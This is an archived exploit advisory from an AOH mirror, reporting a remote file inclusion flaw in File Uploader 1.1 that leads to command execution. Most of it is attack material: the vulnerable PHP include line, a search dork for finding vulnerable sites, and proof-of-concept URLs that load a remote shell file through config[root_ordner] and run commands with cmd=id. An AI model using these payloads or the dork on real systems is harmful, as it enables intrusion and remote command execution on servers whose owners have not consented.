AOH :: HP Unsorted F :: TB11986.HTM

File Uploader Version 1.1 Remote Command Execution Vulnerability



File Uploader Version 1.1 Remote Command Execution Vulnerability
File Uploader Version 1.1 Remote Command Execution Vulnerability



File Uploader Version 1.1 Remote Command Execution Vulnerability 
-----------------------------------------------------------------------


Script  : File Uploader Version 

Version : 1.1
=09
Site : http://www.mapos-scripts.de 

Founder : Rizgar

Contact : rizgar@linuxmail.org and irc.gigachat.net #kurdhack 

Thanks  : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , ColdHackers(nice boys)

d0rk    : "Copyright (c) 2007 by Mapos-Scripts.de", 
-----------------------------------------------------------------------



include($config["root_ordner"].'includes/function.php');


POC

http://www.site.com/path/index.php?config[root_ordner]=http://shell.txt?&cmd=id 
http://www.site.com/path/datei.php?config[root_ordner]=http://shell.txt?&cmd=id 

EOF

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.